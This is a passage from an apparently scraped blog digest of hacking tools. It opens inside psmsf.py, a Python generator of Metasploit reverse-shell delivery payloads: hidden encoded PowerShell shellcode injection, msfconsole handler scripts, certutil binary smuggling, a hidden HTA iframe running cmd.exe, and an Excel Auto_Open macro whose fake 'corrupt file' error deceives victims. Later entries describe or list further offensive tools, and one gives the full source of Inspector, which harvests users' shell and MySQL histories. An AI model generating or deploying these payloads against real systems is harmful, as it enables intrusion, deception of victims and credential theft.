                 "for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};"
                 "$w::CreateThread(0,0,$x,0,0,0);"
                 "for (;;){Start-sleep 60};';"
                 "$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));"
                 "$2 = \"-enc \";"
                 "if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + \"\syswow64\WindowsPowerShell\\v1.0\powershell\";iex \"& $3 $2 $e\"}else{;iex \"& powershell $2 $e\";}" % shellcode)

    return shellcode


def generate_powershell_command(shellcode):
    shellcode = base64.b64encode(shellcode.encode('utf_16_le'))
    return "powershell -window hidden -enc %s" % shellcode


def generate_powershell_attack(payload, host, port):
    """generate shellcode: 0x00,0x00,0x00,..."""
    shellcode = generate_msf_shellcode(payload, host, port)
    shellcode = re.sub("\\\\x", "0x", shellcode)

    counter = 0
    floater = ""
    newdata = ""

    for line in shellcode:
        floater += line
        counter += 1
        if counter == 4:
            newdata = newdata + floater + ","
            floater = ""
            counter = 0

    shellcode = newdata[:-1]
    shellcode = generate_powershell_script(shellcode)
    powershell_cmd = generate_powershell_command(shellcode)

    msfcommand = ("use exploit/multi/handler\n"
                  "set payload %s\n"
                  "set LHOST %s\n"
                  "set LPORT %s\n"
                  "set ExitOnSession false\n"
                  "set EnableStageEncoding true\n"
                  "exploit -j\n") % (payload, host, port)

    ps_dirname = "powershell_attack"
    ps_msf_filename = "powershell_msf.rc"
    ps_script_filename = "powershell_hacking.bat"

    if not os.path.isdir(ps_dirname): os.makedirs(ps_dirname)
    logging.info('create msfconsole resource script')
    write_file("%s/%s" % (ps_dirname, ps_msf_filename), msfcommand)

    logging.info('create powershell shellcode command')
    write_file("%s/%s" % (ps_dirname, ps_script_filename), powershell_cmd)

    return powershell_cmd, msfcommand


def generate_cert_attack(filename):
    if not os.path.isfile(filename):
        logging.info("Please set a file for cert attack")
        sys.exit()

    crt_dirname = "cert_attack"
    crt_encode_filename = "cert_encode.crt"
    crt_decode_filename = "cert_decode.bat"

    crt_encode_filepath = "%s/%s" % (crt_dirname, crt_encode_filename)
    if not os.path.isdir(crt_dirname): os.makedirs(crt_dirname)
    if os.path.isfile(crt_encode_filepath): os.remove(crt_encode_filepath)

    # Translate a binary file to coreutil prep format.
    data = read_file(filename)
    data = base64.b64encode(data)
    data = ("-----BEGIN CERTIFICATE-----\n"
            "%s\n"
            "-----END CERTIFICATE-----" % data)
    logging.info('encode a binary file to a cert file')
    write_file(crt_encode_filepath, data)

    # Create a windows batch decode script (.bat)
    crt_decode_script_filepath = "%s/%s" % (crt_dirname, crt_decode_filename)
    data = "certutil -decode %s encoded.exe" % crt_encode_filename
    logging.info('create a windows batch script for decode')
    write_file(crt_decode_script_filepath, data)



def generate_hta_attack(command):
    hta_module = "module.hta"
    hta_index = "index.html"
    hta_dirname = "windows_hta_attack"

    hta_module_code = ("<script>\n"
            "a=new ActiveXObject(\"WScript.Shell\");\n"
            "a.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);"
            "window.close();\n</script>" % command)

    hta_index_code = ("<iframe "
            "id=\"frame\" "
            "src=\"%s\" "
            "application=\"yes\" "
            "width=0 height=0 style=\"hidden\" "
            "frameborder=0 marginheight=0 "
            "marginwidth=0 scrolling=no></iframe>" % hta_module)

    if not os.path.isdir(hta_dirname): os.makedirs(hta_dirname)

    logging.info('create hta index file')
    write_file("%s/%s" % (hta_dirname, hta_index), hta_index_code)

    logging.info('create hta module file')
    write_file("%s/%s" % (hta_dirname, hta_module), hta_module_code)

    return hta_index_code, hta_module_code


def generate_macro_attack(shellcode, line_length=300):
    data = ""
    cmd_list = [shellcode[i: i+line_length] for i in range(0, len(shellcode), line_length)]
    for line in cmd_list:
        data += "& \"" + line + "\" _\n"

    data = data[:4]
    data = data.replace("&", "", 1)

    macro = ("Sub Auto_Open()\n"
             "Dim x\n"
             "x = \"%s\"\n"
             "Shell (\"POWERSHELL.EXE \" & x)\n"
             "Dim title As String\n"
             "title = \"Critical Microsoft Office Error\"\n"
             "Dim msg As String\n"
             "Dim intResponse As Integer\n"
             "msg = \"This document appears to be corrupt or missing critical "
             "rows in order to restore. Please restore this file from a backup.\"\n"
             "intResponse = MsgBox(msg, 16, title)\n"
             "Application.Quit\n"
             "End Sub" % shellcode)

    logging.info("\n%s" % macro)
    return macro


def powershell_attack_help():
    doc = ("Everything is now generated in two files, ex:\n"
           "    powershell_hacking.bat - shellcode can be executed in cmd console.\n"
           "                           - Usage: cmd.exe /c powershell_hacking.bat\n"
           "    powershell_msf.rc      - msfconsole resource script.\n"
           "                           - Usage: msfconsole -r powershell_msf.rc\n")
    logging.info(doc)
    logging.info("python psmsf.py --attacktype ps --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443")


def cert_attack_help():
    doc = ("The certutil attack vector was identified by Matthew Graeber (@mattifestation) "
           "which allows you to take a binary file, move it into a base64 format and "
           "use certutil on the victim machine to convert it back to a binary for you. "
           "This should work on virtually any system and allow you to transfer a binary "
           "to the victim machine through a fake certificate file. To use this attack, ")
    logging.info(doc)
    logging.info("python psmsf.py --attacktype crt --filename demo.exe")


def hta_attack_help():
    doc = ("The HTA attack will automatically generate two files, ex:\n"
           "    index.html             - redirects browsers to use module.hta\n"
           "    module.hta             - contains the malicious code\n"
           "                           - Usage: http://x.x.x.x/winodows_hta/index.html"
    )
    logging.info(doc)
    logging.info("python psmsf.py --attacktype hta whoami")


def macro_attack_help():
    doc = ("The Macro attack will automatically generate a new macro, and call it. "
           "Auto_Open and paste the generated code into that. This will automatically"
           "run. Note that a message will prompt to the user saying that the file is "
           "corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR!"
           "This is tricking the victim to thinking the excel document is corrupted."
           "You should get a shell through powershell injection after that."
    )
    logging.info(doc)
    logging.info("python psmsf.py --attacktype mac --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443")


def banner():
    banner = """
     ######
      #     #  ####  #    #  ####  ######
       #     # #      ##  ## #      #
        ######   ####  # ## #  ####  #####
         #            # #    #      # #
          #       #    # #    # #    # #
           #        ####  #    #  ####  #
    """

    logging.info(banner)
    return banner


def help():
    usage = "python %prog [options]"
    parser = OptionParser(usage=usage)

    try:
        parser.add_option('--attacktype', dest='attacktype', help='Attack Types are supported. (ps, crt, hta, mac)')

        powershell_opts = OptionGroup(parser, "Powershell/Macro Attack", "Generate metasploit console script / macro")
        powershell_opts.add_option('--payload', dest='payload', type='str', help='payload of metasploit framework')
        powershell_opts.add_option('--lhost', dest='lhost', type='str', help='lhost for payload of metasploit framework')
        powershell_opts.add_option('--lport', dest='lport', type='int', help='lport for payload of metasploit framework')
        parser.add_option_group(powershell_opts)

        crt_opts = OptionGroup(parser, "CERT Attack", "Translate a binary file into a text certification file, and restore the cert file to a binary file on target machines")
        crt_opts.add_option('--filename', dest='filename', type='str', help='file to be encoded to a certification')
        parser.add_option_group(crt_opts)

        hta_opts = OptionGroup(parser, "HTA Attack", "Generate HTA html page. When victims access HTA page, os will be attacked from Internet Explorer")
        hta_opts.add_option('--command', dest='command', type='str', help='command of attack mode')
        parser.add_option_group(hta_opts)

        (args, _) = parser.parse_args()
    except (OptionError, TypeError) as e:
        parser.error(e)
    else:
        return args


if __name__ == "__main__":
    args = help()
    if not args.attacktype:
        banner()
        logging.info('Please -h or --help for more details')
        sys.exit()

    attacktype = args.attacktype.lower()

    if attacktype == 'ps':
        if args.payload and args.lhost and args.lport:
            generate_powershell_attack(args.payload, args.lhost, args.lport)
        else:
            banner()
            powershell_attack_help()

    elif attacktype == 'mac':
        if args.payload and args.lhost and args.lport:
            powershell_cmd, msfcommand = generate_powershell_attack(args.payload, args.lhost, args.lport)
            generate_macro_attack(powershell_cmd)
        else:
            banner()
            macro_attack_help()

    elif attacktype == 'crt':
        if args.filename:
            generate_cert_attack(args.filename)
        else:
            banner()
            cert_attack_help()

    elif attacktype == 'hta':
        if args.command:
            generate_hta_attack(args.command)
        else:
            banner()
            hta_attack_help()
    else:
        banner()
        logging.info('Please -h or --help for more details')

Source: https://github.com/all3g

Tool for Injecting Malicious Payloads Into Barcodes
Barcode Support:
+ Barcodes (code128)
+ QRCodes
+ DataMatrix
+ EAN13

scansploit

Requirements
+ Python3
+ PyStrich
pip3 install pystrich
incase of jpeg error: sudo apt-get install libtiff5-dev zlib1g-dev libfreetype6-dev liblcms2-dev libwebp-dev tcl8.6-dev tk8.6-dev python-tk
Pillow
+ pip3 install pillow

Usage:

git clone https://github.com/huntergregal/scansploit && cd scansploit
python3 scansploit.py

Source: https://github.com/huntergregal

EmailHarvester is A tool to retrieve Domain email addresses from Search Engines.
Requirements:
– Python 3.x
– termcolor
– colorama
– requests

Latest change v1.3.0:
+ Exclude plugins when you choose to search in all search engines and sites
+ List available plugins

EmailHarvester v1.3.0

Features
+ Retrieve Domain email addresses from Search Engines (Google, Bing, Yahoo, ASK, Baidu, Dogpile, Exalead).
+ Export results to txt and xml files.
+ Limit search results.
+ Define your own User-Agent string.
+ Use proxy server.
+ Plugins system.
+ Search in popular web sites using Search engines (Twitter, LinkedIn, Google+).

Download/Installation:

git clone https://github.com/maldevel/EmailHarvester && cd EmailHarvester
pip3 install -r requirements.txt --user
python3 EmailHarvester.py -h

Download: 1.3.0.zip  | 1.3.0.tar.gz 
Source: https://github.com/maldevel

latest change 24/4/2016 version 2.0.0:
+ Interpreter : New release – Bad Blood 2.0.0
+ multi_run() as a decorator.
+ modules: Commands exit and quit for cmd loop.
+ creed: Adding support for targets from file.
+ scanners: Fixing new line issue with print_success.

routersploit v2.0.0

The RouteSploit Framework is an open-source exploitation framework dedicated to embedded devices.
It consists of various modules that aids penetration testing operations:
+ exploits – modules that take advantage of identified vulnerabilities
+ creds – modules designed to test credentials against network services
+ scanners – modules that check if target is vulnerable to any exploit

Usage:

packman install python-requests python-paramiko python-netsnmp (arch linux)
yum install python-requests python-paramiko python-netsnmp (centos/fedora)
sudo apt-get install python-requests python-paramiko python-netsnmp (debian/ubuntu)
git clone https://github.com/reverse-shell/routersploit
pip2 install -r requirements.txt
./rsf.py

UPdate:
git pull origin master

Source: https://github.com/reverse-shell | Our Post before

quantumInject it will capture the traffic from a network interface in promiscuous mode, and attempt to inject spoofed responses to selected client requests towards TCP services.

quantuminject

Your program should conform to the following specification:
quantuminject.py [-i interface] [-r regexp] [-d datafile] [-b filter] expression:
-i Listen on network device <interface> (e.g., eth0). If not specified, quantuminject should select a default interface to listen on. The same interface should be used for packet injection.
-r Use regular expression <regexp> to match the request packets for which a response will be spoofed.
-d Read the raw data that will be used as the TCP payload of the spoofed response packet from <datafile>
-b <expression> is a BPF filter that specifies a subset of the traffic to be monitored. This option is useful for targeting a single IP address, a single
service, etc.

behind Ayad Code

Requirement:
+ all Linux OS Platform
+ Python scapy,
+ sqlalchemy

Usage:

git clone https://github.com/zare3/QuantumInject && cd QuantumInject
python quantuminject.py -h
cd AyadCode
python main.py -h for another expression

Source: https://github.com/zare3

Collection of scripts to aid in delivering payloads via Office Macros. Most are python.
1. macro_safe.py
Generates safe for VB inclusion into an excel spreadsheet. Requires a batch file generated by Veil-Evasion powershell payloads. To include, enable the developer menu in Office, head to Visual Basic tab, double click on This_Workbook and paste the contents of the output file. Syntax is: python macro_safe.py test.bat test.txt
2. exeinvba.py
Generates VB code for including and unpacking a portable executable onto a file system for delivery via Office Macro. To include, enable the developer menu in Office, head to Visual Basic tab, double click on This_Workbook and paste the contents of the output file. Requires a PE. Syntax is: python exeinvba.py –exe test.exe –out test.vb [–dest “C:\Users\Public\Documents\test.exe”] Ensure any backslashes are escaped in the dest variable
3. macro_safe_old.py
Same as macro_safe.py, just uses powershell vice VB for architecture detection to call the correct version of powershell.
4. b64_enc.py
Watered down version of exeinvba.py that will output both the raw base64 string of the executable and the variable specific section of the VB. May be useful for use with different VB templates or other methods that may require an executable passed as a base64 string somewhere. Automatically stores output into base64_output.txt (raw) and base64_output.vb. Syntax is: python b64_enc.py test.exe

Latest change 27/5/2016:
+ test.vb : line increase for exeinvba
+ exeinvba.py: Comment CleaneUp

usage:

git clone https://github.com/khr0x40sh/MacroShop && cd MacroShop
then you can run one by one what do you need.

Source: https://github.com/khr0x40sh

Inspector is an Privilege Escalation unix helper (Forensics, Kernel exploit list, process).
with function:
+ History file; History Mysql, Shell
+ Forensics escalation
+ Process manager

Requirement:
+ Python .7.x
+ all linux platform support

usage:

wget https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py
python inspector.py

Script:

#!/usr/env	python

import os,sys

# Global #######
file_history = []
no_can_open = 0
uname = ""
process_list = ""
kernel_version = ""
history_listing = ['.bash_history','.mysql_history','.bashrc','.zshrc','.zsh_history']
################

def prez():
	print """  _____                           _             
  \_   \_ __  ___ _ __   ___  ___| |_ ___  _ __ 
   / /\/ '_ \/ __| '_ \ / _ \/ __| __/ _ \| '__|
/\/ /_ | | | \__ \ |_) |  __/ (__| || (_) | |   
\____/ |_| |_|___/ .__/ \___|\___|\__\___/|_|   
                 |_|                            
{c} Github.com/Graniet"""

def getShell():
	if len(os.popen('find /Users -name ".bashrc" -type f -print 2>/dev/null').read().strip()) > 1:
		return "bash"
	elif len(os.popen('find /Users -name ".zshrc" -type f -print 2>/dev/null').read().strip()) > 1:
		return "zsh"
	else:
		return "sh?"


def checkShellHistory():
	shell = getShell()
	if len(os.popen('find /Users -name ".'+shell+'_history" -type f -print 2>/dev/null').read()) > 0:
		files = os.popen('find /Users -name ".'+shell+'_history" -type f -print 2>/dev/null').read()
		files = files.split('\n')
		for line in files:
			if line != '':
				for element in open(line, 'r'):
					if element != '':
						print "[#] "+element.strip()
			else:
				print "{!} Can't read ."+shell+"_history"
def checkMySQL():
	if len(os.popen('find /Users -name ".mysql_history" -type f -print 2>/dev/null').read()) > 0:
		files = os.popen('find /Users -name ".mysql_history" -type f -print 2>/dev/null').read()
		files = files.split('\n')
		for line in files:
			for element in open(line, 'r'):
				print "[#] "+element
	else:
		print "{!} Can't read .mysql_history"

def information():
	global uname
	global process_list
	global kernel_version
	kernel_version = os.popen('uname -r').read()
	uname = os.popen('uname -a').read()
	process_list = os.popen('ps axco user,command | grep root').read()
	print "========="
	print "= [!] User > "+os.popen('whoami').read().strip()
	print "= [!] Group > "+os.popen('id -Gn').read().strip()[:20]  
	print "= [!] Shell > "+getShell()
	print "= [!] "+uname.strip()
	print "= [+] Command : process,kernel_exploit,forensic" 
	print "========"

def process_listname():
	global process_list
	list_process = process_list.split('\n')
	for process in list_process:
		if 'mysql' in process:
			print "# " +process
			print "#### [!] MySQL run in root? "
		print "# " + process

def analyse():
	global file_history
	global no_can_open
	global array_analyse
	for line in file_history:
		if os.path.isfile(line):
			try:
				files = open(line, 'r')
				print "{+} " + line.strip()
				for line2 in files:
					if line2 != '':
						if 'mysql -u' in line2:
							print "# MySQL login found"
							print "	(!) MySQL commande line is used for login exemple : mysql -u root -p"
							print "	>>> " + line2.strip()
						if 'ssh' in line2:
							print "# SSH found"
							print "	(!) SSH used for secure connexion"
							print "	>>> "+ line2.strip()
													
			except:
				no_can_open = no_can_open + 1


def kernel_exploit():
	global kernel_version
	print "[!] kernel version: "+kernel_version

def history_help():
	print "=========="
	print "[+] MySQL history > history mysql"
	print "[+] Shell history > history shell"
	print "=========="

def main():
	x = 0
	while len(history_listing) > x:
		global file_history
		for fichier in history_listing:
			history = os.popen('find /Users -name "'+fichier+'" -type f -print 2>/dev/null').read()
			history = history.split("\n")
			#history = open('~/.bash_history', 'r')
			for line in history:
				if(line != ""):
					file_history.append(line)
			x = x+1
		information()
	#	analyse()
		try:
			while 1:
				prompt = raw_input('Inspector > ')
				if 'forensic' in prompt:
					analyse()
				if 'process' in prompt:
					process_listname()
				if 'kernel_exploit' in prompt:
					kernel_exploit()
				if 'history mysql' in prompt:
					checkMySQL()
				if 'history shell' in prompt:
					checkShellHistory()
				if 'help' in prompt:
					information()
				if prompt == "history":
					history_help()

		except:
			print "bye ^^"
prez()
main()

Source: https://github.com/graniet

Changelog v1.1.22 Full Featured:
+ setup.py and Bluto folder version Fix.

Bluto v1.1.22

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain NS records are each queried for potential Zone Transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub processing on the top 20000 of the ‘The Alexa Top 1 Million subdomains’. NetCraft results are presented individually and are then compared to the brute force results, any duplications are removed and particularly interesting results are highlighted.

Bluto-v-1-1-14
Bluto is attempting to brute force the target domain. this Tools has been tested on Ubuntu, Arch Linux, Centos, FreeBSD,redhat Fedora, Debian And Kali 2.0

Installation And Update Using Git:

pip install git+git://github.com/RandomStorm/Bluto
Upgrade:
pip install git+git://github.com/RandomStorm/Bluto --upgrade

Our Post Before
Source: https://github.com/RandomStorm

STB – Security Tools Builder.
What’s STB?
This project help you to create the skell for a hacking tool.
STB uses the OMSTD methodology concepts to build a reusable application.
Background OMSTD:
+ OMSTD (Open Methodology for Security Tool Developers) is a series of case studies, grouped and categorized as a guide, with which to achieve develop well-built tools.
+ Although it can be used to create any type of tools and in any language, focuses primarily on the development of hacking tools written in Python.

Usage & Download:

git clone https://github.com/abirtone/STB && cd STB
pip install -r requirements.txt
python setup.py Install (or using pip: pip install stb)

then
cd your folder name
pip install -r requirements.txt
python setup.py install
sudo [your tools name] -h

Source: https://github.com/abirtone